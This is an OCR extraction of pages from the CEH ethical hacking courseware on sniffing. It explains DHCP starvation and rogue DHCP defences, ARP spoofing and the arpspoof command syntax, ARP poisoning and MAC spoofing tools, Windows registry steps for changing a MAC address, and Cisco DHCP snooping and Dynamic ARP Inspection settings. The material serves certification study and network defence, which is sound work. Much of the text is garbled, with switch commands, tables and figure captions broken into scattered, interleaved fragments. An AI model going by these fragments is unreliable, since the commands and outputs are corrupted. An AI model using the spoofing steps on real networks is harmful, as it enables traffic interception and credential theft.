How to Defend Against DHCP Starvation and Rogue Server Attacks Defend Against DHCP Starvation Enable port security to defend against a DHCP starvation attack. Port security limits the maximum number of MAC addresses on the switch port. When the limit is exceeded, the switch drops subsequent MAC address requests (packets) from external sources, which safeguards the server against a DHCP starvation attack. Module 08 Page 1250
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Sniffing
Exam 312-50 Certified Ethical Hacker
Attacker
User
Figure 8.30: Defending against a DHCP starvation attack
Internetwork Operating System (IOS) Switch Commands Source: https://www.cisco.com =
switchport
port-security
The switchport port-security to enable port security. ="
switchport
port-security
command
maximum
configures the switch port parameters
1
The switchport port-security maximum number of secure MAC addresses for the port.
command
The switchport port-security maximum 1 command number of secure MAC addresses for the port as 1. =
switchport
port-security
violation
configures
the
maximum
configures the maximum
restrict
The switchport port-security violation command sets the violation and the necessary action in case of detection of a security violation.
mode
The switchport port-security violation restrict command drops packets with unknown source addresses until a sufficient number of secure MAC addresses are removed. ="
switchport
port-security
aging
The switchport port-security MAC address aging time on the port. The switchport 2 minutes. ="
switchport
port-security
port-security
Module 08 Page 1251
aging aging
aging
The switchport port-security MAC address aging type on the port.
time
2
time time
type
aging
command
configures the secure
2 command sets the aging time as
inactivity
type
command
configures the secure
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Sniffing
Exam 312-50 Certified Ethical Hacker
The switchport port-security aging type as inactivity aging. =
switchport
port-security
This command enables address sticky keywords. MAC addresses that are these addresses to sticky
aging
type
mac-address
inactivity
command
sets the
sticky
sticky learning on the interface by entering only the MACWhen sticky learning is enabled, the interface adds all secure dynamically learned to the running configuration and converts secure MAC addresses.
Defend Against Rogue Server Attack The DHCP snooping feature that is available on switches can mitigate against rogue DHCP servers. It is configured on the port on which the valid DHCP server is connected. Once configured, DHCP snooping does not allow other ports on the switch to respond to DHCP Discover packets sent by clients. Thus, even an attacker who manages to build a rogue DHCP server and connects to the switch cannot respond to DHCP Discover packets. DHCP Snooping
Enabled
> :
IP ID: 10.10.10.1
MAC: 00-14-20-01-23-45
:
:
ARP_REQUEST
Hello, | need the MAC address of 10.10.10.3
ee IP 1D: 10.10.10.2 MAC: 00-14-20-01-23-46
IP ID: 194.54.67.10
MAC: 00:1b:48:64:42:e4
AA
ARP_REQUEST
eee =
ARP_REPLY | am 10.10.10.3.
eee ees
03
MAC address is 00-14-20-01-23-47
Prererr reer rer rrr rerirerr errr rrriirsy
Connection Established
>
IP ID: 10.10.10.3
MAC: 00-14-20-01-23-47
Figure 8.32: Working of ARP protocol
Consider an ARP example that shows two machines connected hostnames, IPs, and MAC addresses are: HostName
IP
in a network. The respective
MAC
A
194.54.67.10
00:1b:48:64:42:e4
B
192.54.67.15
00-14-20-01-23-47
Before communicating with host B, host A first checks for a record of host B’s MAC address in the ARP cache. If host A finds the record of a MAC address, it communicates directly with host B. Otherwise, it has to access host B’s MAC address using ARP protocol. Host A queries all the hosts on the LAN. If the query were phrased in plain English, it might sound like this: “Hello, who is 192.54.67.15? This is 194.54.67.10. My MAC address is 00:1b:48:64:42:e4. | need your MAC address.” Here, host A sends a broadcast request data packet to host B. On receiving the ARP request packet, host B updates its ARP cache table with host A’s IP and MAC addresses, and sends an Module 08 Page 1256
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Sniffing
Exam 312-50 Certified Ethical Hacker
ARP reply packet to host A that would be phrased in English as, “Hey, this is 192.54.67.15; my MAC address is 00-14-20-01-23-47.” On receiving the ARP reply, host A updates its ARP cache table with host B’s IP and MAC addresses. After establishing a connection, these two hosts can communicate with each other.
-
BH Command Prompt
o
x
Figure 8.33: ARP cache
ARP Spoofing Attack ARP resolves IP addresses to the MAC (hardware) address of the interface to send data. ARP packets can be forged to send data to the attacker’s machine. ARP spoofing involves constructing a large number of forged ARP request and reply packets to overload a switch. When a machine sends an ARP request, it assumes that the ARP reply will come from the right machine. ARP provides no means of verifying the authenticity of the responding device. Even systems that have not made an ARP request can accept the ARP replies coming from other devices. Attackers use this flaw in ARP to create malformed ARP replies containing spoofed IP and MAC addresses. Assuming it to be the legitimate ARP reply, the victim’s computer blindly accepts the ARP entry into its ARP table. Once the ARP table is flooded with spoofed ARP replies, the switch is set in forwarding mode, and the attacker intercepts all the data that flows from the victim’s machine without the victim being aware of the attack. Attackers flood a target computer’s ARP cache with forged entries, which is also known as poisoning. ARP spoofing is an intermediary for performing attacks such as DoS, MITM, and session hijacking. How does ARP Spoofing Work? ARP spoofing is a method of attacking an Ethernet LAN. When a legitimate user initiates a session with another user in the same layer 2 broadcast domain, the switch broadcasts an ARP request using the recipient's IP address, while the sender waits for the recipient to respond with a MAC address. An attacker eavesdropping on this unprotected layer 2 broadcast domain can respond to the broadcast ARP request and replies to the sender by spoofing the intended recipient’s IP address. The attacker runs a sniffer and turns the machine’s NIC adapter to promiscuous mode. ARP spoofing is a method of attacking an Ethernet LAN. It succeeds by changing the IP address of the attacker’s computer to that of the target computer. A forged ARP request and reply
Module 08 Page 1257
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Sniffing
Exam 312-50 Certified Ethical Hacker
packet can find a place in the target ARP cache in this process. As the ARP reply has been forged, the destination computer (target) sends frames to the attacker’s computer, where the attacker can modify the frames before sending them to the source machine (User A) in an MITM attack. The attacker can also launch a DoS attack by associating a non-existent MAC address to the IP address of the gateway; alternatively, the attacker may sniff the traffic passively and then forward it to the target destination. Yes, lam here
Poisoned ARP cache
pee | I want to connectto 10.1.1.1, but Ineed a MACaddress
Ns SS o
10.1.1.0 10.1.1.1
21-56-88-99-55-66 11-22-33-44-55-66
10.1.1.2
55-88-66-55-33-44
Sends ARP request 7 (>y > eben >
responds to the ARP request Vi
e
Sends his malicious e MAC address H 1am 10.1.1.1and
my MAC address is
deeeeeey >
: ! Malicious user eavesdrops on t the ARP request and t responses and spoofs as the legitimate user
Geecees >
:
Vv
A
ii User D
v
11-22-33-44-55-66
xX
Information for IP address
10.1.1.1is now being sent to
MAC address 11-22-33-44-55-66
@
Attacker
el
Figure 8.34: Working of an ARP spoofing attack
Module 08 Page 1258
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Sniffing
Exam 312-50 Certified Ethical Hacker
Threats of ARP Poisoning ‘|@
Using fake ARP messages, an attacker can divert all communications between two machines, resulting in all
traffic being exchanged via the attacker’s PC
1 |
Packet Sniffing
| 6 |
Data Interception
|| 2 |
Session Hijacking
1\[ | 7 |
Connection Hijacking
]
| Hi
VoIP Call Tapping
] | | ls
Connection Resetting
]
[| 4 |
Manipulating Data
lI] | 9 |
Stealing Passwords
|
[ is |
Man-in-the-Middle Attack
]
Denial-of-Service (DoS) Attack
|
|
| 10 |
hts Reserved. Reproduction
Threats of ARP Poisoning With the help of ARP poisoning, an attacker can use fake ARP messages to divert communications between two machines so that all traffic redirects via the attacker’s PC.
all
The threats of ARP poisoning include: =
Packet Sniffing: Sniffs traffic over
=
Session Hijacking: Steals valid session access to an application.
=
VoIP Call Tapping: Uses port mirroring, which allows the VoIP call tapping unit to monitor all network traffic, and picks only the VoIP traffic to record by MAC address.
=
Manipulating Data: ARP spoofing allows attackers to capture and modify data, or stops the flow of traffic.
=
Man-in-the-Middle Attack: An between the victim and server.
=
Data Interception: Intercepts IP addresses, MAC addresses, and VLANs connected to the switch in a network.
=
Connection Hijacking: In a network, the hardware addresses are supposed to be unique and fixed, but a host may move when its hostname changes and use another protocol. In connection hijacking, an attacker can manipulate a client’s connection to take complete control.
=
Connection Resetting: The wrong routing information could be transmitted due to a hardware/software error. In such cases, if a host fails to initiate a connection, that host
Module 08 Page 1259
a network or a part of the network.
attacker
information
performs
and
uses it to gain unauthorized
a MITM
attack where
they
reside
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Sniffing
Exam 312-50 Certified Ethical Hacker
should inform the Address Resolution module to delete its information. The reception of data from that host will reset a connection timeout in the ARP entry used to transmit data to that host. This entry in the ARP module is deleted if the host does not send any information for a certain period of time. =
Stealing Passwords: An attacker uses forged ARP replies and tricks target hosts into sending sensitive information such as usernames and passwords.
=
DoS Attack: Links multiple IP addresses with a single MAC address of the target host that is intended for different IP addresses, which will be overloaded with a huge amount of traffic.
Module 08 Page 1260
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Sniffing
Exam 312-50 Certified Ethical Hacker
CEH
redirects packets from a target host (or all hosts) on the LAN arpspoof | arpspoof PSP that are intended for another host on the LAN by forging ARP replies
ie
ARP Poisoning Tools
ipsum bettercop.crg Ettercap eeps:/ a ettercop-prject.org
the attackerssystem
‘tesa
BetterCAP
net
Haba Habu is a hacking toolkit
mitwt
‘etps://atub com
that provides various
commands to perform ARP poisoning, sniffing, DHCP
Vi LOS
starvation, etc.
Arpoison
tepseestrsenet
https//ethub com
ARP Poisoning Tools =
arpspoof Source: https://linux.die.net arpspoof redirects packets from a target host (or all hosts) on the LAN that are intended for another host on the LAN by forging ARP replies. This is an extremely effective way of sniffing traffic on a switch. Syntax: arpspoof
-i
[Interface]
-t
[Target
Host]
As shown in the screenshot, attackers use the arpspoof tool to obtain the ARP cache; then, the MAC address is replaced with that of an attacker’s system. Therefore, any traffic flowing from the victim to the gateway will be redirected to the attacker’s
system.
Further, an attacker can issue the same command and can send ARP replies in both directions.
Module 08 Page 1261
in reverse as he/she is in the middle
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Sniffing
Exam 312-50 Certified Ethical Hacker
address is replaced with that of the attacker's system
Figure 8.35: Screenshots of arpspoof
=
Habu
Source: https://github.com Habu is a hacking toolkit that provides various commands attacks: o
ARP poisoning and sniffing
o
DHCP discovery and starvation
o
Subdomain identification
o.
Certificate cloning
oO
TCP analysis (ISN, flags)
o
Username check on social networks
o
Web technology identification
Module 08 Page 1262
to perform
the following
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Sniffing
Figure 8.36: Screenshot of Habu
Some examples of ARP poisoning tools are listed below:
BetterCAP (https://www.bettercap.org) Ettercap (https://www.ettercap-project.org) dsniff (https://www.monkey.org) MITMf (https://github.com)
Arpoison (https://sourceforge.net)
Module 08 Page 1263
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Sniffing
Exam 312-50 Certified Ethical Hacker
How to Defend Against ARP Poisoning |
CE H
Implement Dynamic ARP Inspection Using DHCP Snooping Binding Table sh ip dhep snooping binding
Macddress ta:12:3b:2¢;d£:1¢
IpAdiress 10.10.10.8
Lease 125864
Type ‘VIAN —_—sInterface dhep-_ «= &—sFastthernet3/18 snooping
A
DHCP Snooping Enabled | Dynamic ARP Inspection Enabled ,
10.10.10.2 MACB
10.10.10.1 MAC A
|
No ARP entry in the binding table then discard the packet
10.10.10.5 MAC C
How to Defend Against ARP Poisoning Implementation of Dynamic ARP Inspection (DAI) prevents poisoning attacks. DAI is a security feature that validates ARP packets in a network. When
DAI activates on a VLAN, all ports on the
VLAN are considered to be untrusted by default. DAI validates the ARP packets using a DHCP snooping binding table. The DHCP snooping binding table consists of MAC addresses, IP addresses, and VLAN interfaces acquired by listening to DHCP message exchanges. Hence, you must enable DHCP snooping before enabling DAI. Otherwise, establishing a connection between VLAN devices based on ARP is not possible. Consequently, a self-imposed DoS may result on any device in that VLAN.
To validate the ARP packet, the DAI performs IP-address-to-MAC-address binding inspection stored in the DHCP snooping database before forwarding the packet to its destination. If any invalid IP address binds a MAC address, the DAI will discard the ARP packet. This eliminates the risk of MITM attacks. DAI ensures the relay of only valid ARP requests and responses. If the host systems in a network hold static IP addresses, DHCP snooping will not be possible, or other switches in the network cannot run dynamic ARP inspection. In such situations, you have to perform static mapping that associates an IP address to a MAC address on a VLAN to prevent
an ARP poisoning attack.
Software can be implemented that runs custom scripts compare the current ARP table to the list of known mismatch in the list of valid MAC/IP pairs, the switch helpful in defending against ARP poisoning attacks important LAN machines such as servers and gateways.
Module 08 Page 1264
to monitor ARP tables. This script can MAC and IP addresses. If there is a will drop the packet. Such scripts are by monitoring the MAC/IP pairs on
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Sniffing
Exam 312-50 Certified Ethical Hacker
The implementation of cryptographic protocols such as HTTP Secure (HTTPS), Secure Shell (SSH), Transport Layer Security (TLS), and various other networking cryptographic protocols prevents ARP spoofing attacks by encrypting data before transmission and authenticating it after it is received. sh ip dhcp snooping binding MacAddress
Lasl2:3b:2£;df:1e
IpAddress
10.10.10.8
Lease
Type
125864 — dhep-
snooping
VLAN
4
Interface
10.10.10.1
FastEthernet3/18
MACA
DHCP Snooping Enable Dynamic ARP Inspection Enable
[No ARP entry in the | binding table then \_ discard the packet _|
ARP 10.10.10.1 Saying 10.10.10.2 is MACC 10.10.10.2 MACB
ARP 10.10.10.2
Saying 10.10.10.1
is MACC
|
10.10.10.5
Macc
Check the MAC and IP fields to see if the ARP from the interface is in the bindit not, traffic is blocked
Figure 8.37: Defending against ARP poisoning
Module 08 Page 1265
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Sniffing
Exam 312-50 Certified Ethical Hacker
Configuring DHCP Snooping and Dynamic ARP Inspection on Cisco Switches
yas mown
1]
4p dhep snooping vlan 10 “2 show ip dhep snooping ping is enabled nfigured on erational on fol configured on the follo
C IE H Pood both
Svight 72 on oman
4# show ip arp inspection
g trust/rate is configured on the following
la:i2:3b:2£;de:1¢ 10.10.10.8 125864 Total number of bindings: 1
@-FastEthernet 0/3
dhopsnooping
Strictly Prohibited
Configuring DHCP Snooping and Dynamic ARP Inspection on Cisco Switches As discussed, feature that messages. A segment and
DHCP snooping must be enabled before enabling DAI. DHCP snooping is a security builds and maintains a DHCP snooping binding table and filters untrusted DHCP Cisco switch with DHCP snooping enabled can inspect DHCP traffic flow at a layer 2 track IP addresses to switch port mapping.
To configure DHCP snooping on a Cisco switch, ensure DHCP snooping is enabled both globally and per access VLAN. To enable DHCP snooping, execute the following commands: Configuring DHCP snooping in global configuration mode Switch (config)#
ip
dhcp
snooping
Configuring DHCP snooping for a VLAN Switch
(config)#
Switch
(config)
ip
#
dhcp
snooping
vlan
10
*Z
To view the DHCP snooping status Switch# Switch
show DHCP
ip
dhcp
snooping
snooping is
enabled
DHCP
snooping
is
configured
DHCP
snooping
is
operational
DHCP
snooping
is
configured
DHCP
snooping
trust/rate
Interface
Module 08 Page 1266
is
Trusted
on on on
following
VLANs:
following the
VLANs:
following
configured Rate
on
limit
10
L3
the
10 Interfaces:
following
Interfaces:
(pps)
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Sniffing
Exam 312-50 Certified Ethical Hacker
If the switch is functioning only at layer 2, apply the ip dhcp snooping trust command to the layer 2 interfaces to designate uplink interfaces as trusted interfaces. This informs the switch that DHCP responses can arrive on those interfaces. The DHCP snooping binding table contains the trusted DHCP clients and their respective addresses. To view the DHCP snooping table, you have to execute the following command: Switch
(config)
#
show
ip
dhcp
snooping
IP
binding
This displays the DHCP snooping table, which contains the MAC addresses, respective IP addresses, and total number of bindings. The following is an example of a DHCP snooping binding table: MAC
Address
IP
1a:12:3b:2£;df:1c Total
number
of
Address
Lease
10.10.10.8 bindings:
(sec)
Type
125864
VLAN
dhcp-snooping
Interface
4
FastEthernet0/3
1
After establishing a DHCP snooping binding table, the user can start configuring DAI for the VLAN. To enable DAI for multiple VLANs, specify a range of VLAN numbers. Command to configure ARP inspection for a VLAN Switch
(config)#
Switch
(config)
ip
#
arp
inspection
vlan
10
*Z
Command to configure ARP inspection for a range of VLANs Switch
(config)#
ip
arp
inspection
vlan
10,
11,
Switch (config)#
ip
arp
inspection
vlan
10-13
12,
13
Or To view the ARP inspection status Switch
Source
(config)#
Mac
Address
Vlan
10 Vlan
10
ip
Mac
Validation
Enabled
Disabled
:
Disabled
:
Disabled ACL
Logging
DHCP
Logging
Deny
10
t)
()
10
Permits
ACL
() Dest
Probe
DHCP
Drops
ACL
Logging
MAC
(}
Failures
ACL
0 Permits IP
Drops
(e) Probe
0
10
Static
Off Dropped
DHCP
Match
Active
Forwarded
Vlan
:
Operation
Vlan
Vlan
inspection
Validation
Configuration ACL
arp
Validation
Destination IP
show
Permits
Source
() Validation
0
MAC
Failures
(}
Failures
Invalid
Protocol
Data
t)
From this IP ARP inspection result, it is clear that the source MAC, destination MAC, and IP address are disabled. Even more security can be attained by enabling one or more of these
Module 08 Page 1267
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Sniffing
Exam 312-50 Certified Ethical Hacker
additional validation checks. To do so, validate followed by the address type.
execute
the
command
ip
arp
inspection
Assume that an attacker with the source IP address 192.168.10.1 connects to VLAN 10 on interface FastEthernet0/5 and sends ARP replies, pretending to be the default router for the subnet in an attempt to initiate an MITM attack. The switch with DAI enabled inspects these reply packets by comparing them with the DHCP snooping table. The switch then tries to find an entry for the source IP address 192.168.10.1 on port FastEthernet0/5. If there is no entry, then the switch discards these packets. %SW_DAI-4-DHCP_SNOOPING DENY:
1
Invalid
ARPs
(Res)
on
Fa0/5,
vlan
([0013.6050.acf4/192.168.10.1/£ff£.£f££.£f££/192.168.10.1/05:37:31 APR 12 2022])
10
UTC
Tue
If the discarding of packets starts, then the drop count begins to increase. You can see this increase in the drop count in the DAI output. To see the output, execute the command show ip
arp
inspection
Switch
Source
(config)#
Mac
Address
Mac
Validation:
Configuration
10
Enabled
Vlan
ACL
Vlan
arp
Logging
10
30
10
30
Module 08 Page 1268
Disabled
Disabled
Operation
ACL
Match
Static
ACL
Active DHCP
Deny
Forwarded
inspection
Disabled
Validation:
Vlan
10
ip
Validation:
Destination IP
show
Logging
Probe
Deny
Dropped
Logging
Off
DHCP
5
Drops
5
()
ie)
ACL
Drops
(e)
(0)
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Sniffing
Exam 312-50 Certified Ethical Hacker
Capsa Portable Network Analyzer Ithelps security professionals in quickly detecting ARP poisoning and ARP flooding attacksand in locating the attack source
|
iatreiare anette ree Pat OO (PP) A: F-S Ce wo & 2 [omisarseron rackets
te
ARP Spoofing Detection Tools
x
Wireshark etps://ucwireshork.org
CD
ArpON
2
ARP AntiSpoofer
LQ.
ee hetas://sourceforge.net
ARPStraw ‘tps:/atub.com shARP ‘tps:/ att.com
ARP Spoofing Detection Tools =
Capsa Portable Network Analyzer
Source: https://www.colasoft.com Capsa, a portable network performance analysis and diagnostics tool, provides packet capture and analysis capabilities with an easy-to-use interface, allowing users to protect and monitor networks in a critical business environment. It helps security professionals in quickly detecting ARP poisoning and ARP flooding attacks and in locating the attack
source.
Module 08 Page 1269
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Sniffing
o_arp_attack File
Edit
Exam 312-50 Certified Ethical Hacker
- Colasoft
View
Project
Capsa
Tools
[Stopped] - 00:13:8F:6B:7D:99
Window
5
Help
OeP&8\|0. 0.4/0 0| » FF & & 8 a a New Open Save Back ” Food Up Start_Sicp Settings Adepter Fier Network Log Diagnosis Name Table Filter Table Opt 4 > _/ Summary |Diagnosis | Endpoints |Pratocols | Conversations | Matrix Packets |Logs Graphs | Reports B) Explorer 2
ono
#100
C)
WD
4
4 WD @.
a
-23{\6? Tell 21.36.23...
238077 Tell 21.36.23...
1299.8? Tell 21.96.23...
co.ts.sees oost1:s0:6¢4
Networking and Sharing Center
In Windows 11 OS
Method 1: Ifthe network interface card supports a clone MAC address, then follow these steps:
@
x
In the Ethernet Properties window, click on the Configure button and then click on the Advanced tab
SBS
Microsoft Hyper-V Newerk Adapter Properties overt [Free] Onver Dette Evers “Thefolong avalible fr ta adetnaen elect adapter. Cleae {heone pepey youpopate warts aechange on tel,
Click on Ethernet and then click on Propertiesin the Ethernet Status window
Under the “Property” section, browse for Network Address and click on it
On the right side, under “Value,” type in the new MAC address you would like to assign and click OK Note: Enter the MAC address number without a “:” between the number pairs Type “ipconfig/all” or “net config rdr” in the command promptto verify the changes If the changes are visible then reboot the system, otherwise try method 2 (change MAC address in the registry)
MAC
Spoofing Technique: Windows
CEH
(Cont’d)
| Method 2: Steps to change the MAC address in the Registry | @ Press Win+ Rto open Run, type regedit tostartthe registry editor Goto “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\c ontrol\Class \{4d36e972-e325-11.ce-bfc1(08002be10318} and double click on it to expand the tree | 4-digit sub keys representing network adapters will be displayed (starting with 0000, 0001, 0002, etc.) @ Search for the proper “DriverDesc” key tofind the desired interface @ Right-click on the appropriatesub key and add, new string value "NetworkAddress” (data type"REG_SZ") to contain the new MAC address @ Right click on the “NetworkAddress” string value on the right side and select Modify... @ Inthe “Edit String” dialogue box, “Value data” field enter the new MAC address and click “OK” @ Disable and then re-enable the network interface that was changed or reboot the system
(ec er ET vou neuen iwnccomnaa cotaras ncrcecamnenra BS5 (ears ewes) a Stem pprromaeanect) (era eee Nee et (eb ery
aDNe))
©mz az xox no oschectom RES orenecaon HEE aap RES howe FEGOWORD
(Udi eee ames SOD) B toesrars Neem B aarsazs eee mes S taer osetctahe 8 B taea teoean arsse eeecs ame8 Bene as eee ast) 1B teneereos eee be tener eres)
oo naz HOS nos
:
3a ocr
Meret tise ae
MAC Spoofing Technique: Windows There are two methods for MAC spoofing in Windows 11 OS: Method 1: If the network interface card supports clone MAC address, then follow these steps: 1.
Click on Start, search for Control Panel and open Internet > Networking and Sharing Center.
Module 08 Page 1273
it, then
navigate to Network and
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Sniffing
Exam 312-50 Certified Ethical Hacker
2.
Click on Ethernet and then click on Properties in the Ethernet Status window.
3.
In the Ethernet Advanced tab.
4.
Under the “Property” section, browse for Network Address and click on it.
5.
On the right-hand side, under “Value,” type in the new MAC address you would like to assign and click OK.
Properties window,
click on the Configure
button
and
then
on the
Note: Enter the MAC address number without “:” in between. 6.
Type “ipconfig/all” or “net config rdr” in the command prompt to verify the changes.
7.
If the changes are visible, then reboot the system, or else try method 2 (change MAC address in the registry). Microsoft Hyper-V Network Adapter Properties
General
Driver
Details
Events
The following properties are available for this network adapter. Click
the property you want to change on the left, and then select its value
‘on the right
Property:
Value:
Forwarding Optimization
Hyper-V Network Adapter Name
Q00A959D6816
IPSec Offload IPv4 Checksum Offload Jumbo Packet
Large Send Offload Version 2 (IPvs
Large Send Offload Version 2 (IPvt Max Number of RSS Processors Maximum Numberof RSS Queues Maximum RSS Processor Number
‘Network Direct (ROMA) Packet Direct | Receive Buffer Size
Cancel
Figure 8.40: Ethernet Properties dialog box
Module 08 Page 1274
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Sniffing
Method 2: Steps to change the MAC address in the registry: 1.
Press Win + R to open Run, and type regedit to start the registry editor.
2.
Go to "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4d36e972e325-11ce-bfc1-08002be10318} and double-click on it to expand the tree.
3.
Four-digit sub keys representing network adapters will be found
0001, 0002, etc.).
(starting with 0000,
4.
Search for the proper “DriverDesc” key to find the desired interface.
5.
Right-click on the appropriate sub key and add the new string value “NetworkAddress” (data type “REG_SZ”) to contain the new MAC address.
6.
Right-click on the “NetworkAddress” string value on the right side and select Modify...
7.
Now, in the “Edit String” dialog box, enter the new MAC address in the “Value data” field and click “OK.”
8.
Disable and then
re-enable
the network
interface that was
changed,
or reboot the
system.
Name 28) -ReclPvd 28) ReclPv6 ab)-RSS at) ResBaseProcNu...
ype REG.Sz REG Sz REG Sz REG SZ REG.SZ
36e96-325-11ce-fet-0e00dbet0318) f1-os002be10316) ||| 28)*7CPChecksum..
REG_SZ
(Ldedo-e325-T ce be-80026e10318) dSedb-25- eer -0002be 1318) e25 -noaseosie) || A) RsBareProcNa. teeter De asesec bfc1-08002be10318} —— (4d36€96d-€325-11ce——REG.SZ *)"SSProecksum... REG_SZ oeneaber0ste) |||||| *2)"TCPChe tee bet-e2SLdSbedte e-bfc1-08002be10318) | || 28)*UDPChecksum....
REG_SZ
1’
j / : 3 3
3 e-bfc1-08002be10318) || #8)*UOPChecksum... REG SZ x0 REG SZ 2)BusType 8lchacacterstics_REG_DWORD 00000008 (4) VMBUS\(f8615163-dfBe-d6c5-9131-(242/965edDe) REG_SZ s8)Componentid MBUS\((9615163-af3e-d6c5-9131-1242965edDeN )DeviceinstancelO REG_SZ 6-21-2006 REG SZ 2)DrverDate 00 808¢ a3 594 e601 32)DriveDateData_ REG BINARY a DrverDese REG_SZ ‘Microsoft Hyper. Network Adapter 10022000434 REG_SZ = Drverversion ° )ForwardingOpti... REGSZ " ai) Hype Network. REG.SZ | Fae sting > = ye —_REG_DWK B2lifypePreStat oaecia oe cows 22)infPath REG_SZ_Vabe nane: enim 2)InfSection REG SZ NetwonkAdeeae 318) || HlnstalTimestamp —REG_BINF (44360873-€325-11ce-bfct-08002be10 f1.08002be10318) || 28) MatchingDeviceld REG_SZ f1.08002be10316) || *2)NetCfglnstanceld REG_SZ Coneel (1-08002be10316) || 3NetLuidindex __REG. DW ‘ (4d36e978-€325-11ce-bfcl-08002be10318) (1481357738060 (132877455328305375) (44360879-€325-11ce-bfct-08002be10318) || B2|Networkinterfa... REG_QWORD Microsoft —_-REG_SZ ‘Dil {4436¢97b-€325-11ce-bfc1-08002be10318) || #8)ProviderName 8192 (4d360974-e325-N1ce-bfe1-08002be10318} || ab) ReceiveBufferSze REG SZ 1028 (4d36e87e-e325-11ce-bfcT-O8002be10318} || st)sendBufferSze _REG_SZ ° REG Sz 2)Vlaio = = Figure 8.41: Registry Editor
Module 08 Page 1275
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Sniffing
Exam 312-50 Certified Ethical Hacker
MAC Spoofing Tools Technitium MAC Address Changer
Technitium MAC Address Changer (TMAC) | @lows you to change (spoof) the Media ‘Access Control (MAC) Address of your
SMAC ‘ttps:/ideconsutting.net
Network Interface Card (NIC) instantly
[GhangNe ed [mat adie T Tow Nn Tasan] pear -Coabe00050) Up.Opwara No ootSs50-2000
MAC Address Changer ‘ttps://wunovirusthanks.org
Sed Obst Ode
Change MAC Address ‘tps: fizardsystems.com
niin MAC Aone oorss0at000 rdware 1D YMOUS\OISTO) oe d:59122e95Sed Misco Capatson Ader One Mest Wa Config as65559FES340738:R50CCZS0BIT14 TOPAP et En TePAPy6: Erbies
Easy Mac Changer
‘https://github.com
IF MakenMAC ses pte 7 Use ae iat MAC aces Whi?
‘Spoof-Me-Now
fcr]
‘https://sourceforge.net
MAC Spoofing Tools =
Technitium MAC Address Changer
Source: https://technitium.com Technitium MAC Address Changer (TMAC) allows address of your NIC instantly. Every NIC has a MAC the manufacturer. This hard-coded MAC address is the Ethernet network (LAN). This tool can set a new the original hard-coded MAC address.
you to change (spoof) address hardcoded in its used by Windows drivers MAC address to your NIC,
As shown in the screenshot, attackers can use TMAC address to perform an attack on the target system.
Module 08 Page 1276
the MAC circuit by to access bypassing
to spoof or change their MAC
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Sniffing
Exam 312-50 Certified Ethical Hacker
figi] Technitium MAC Address Changerv6 - by Shreyas Zare
File Action Options Network Connections
Help
[Changed | MAC Address
Ethernet (Kernel Debugger)
No
Ethemet
No
00-00-00-00-00-00
—_00-15-5D-01-80-00
Link Status
Speed
Down, Non Operational
Obps
Up. Operational
Obps
Information | IP Address | Presets |
Connection Details Connection Ethemet
Original MAC Address
Device Microsoft Hyper’ Network Adapter Hardware ID VMBUS\{(9515163-d'3e-46c5-91 3+/2d26985ed0« Config ID (64983588-F693-4023-B9B6-DCC294DB1114} TCPAP v4:
Enabled
TCPAPY¥6:
00-15-5D-01-80-00 Microsoft Corporation (Address: One Microsoft Wa
Active MAC Address
00-15-5D-01-80-00 (Original)
Enabled
Microsoft Corporation
| Change MAC Address 00 - 1A - 9B - 49 - 61 f[o0-14-98) ADEC & Parter AG
(Address: One Microsoft War
. - 4F
Random MAC Address
(Address: Staldenbachstrasse 30, ea
¥ Automatically restart network connection to apply changes
Make new MAC address persistent
[7 Use '02' as first octet of MAC address
Received 485.67 MB (488293901 bytes} ~Speed 490 B/s (490 bytes) Sent 8.32 MB (8719829 bytes} ~Speed_0B/s {0 bytes}
Why?
Figure 8.42: Screenshot of Technitium MAC Address Changer (TMAC)
Some examples of MAC spoofing tools are listed below:
SMAC (https://kIcconsulting.net) MAC Address Changer (https://www.novirusthanks.org)
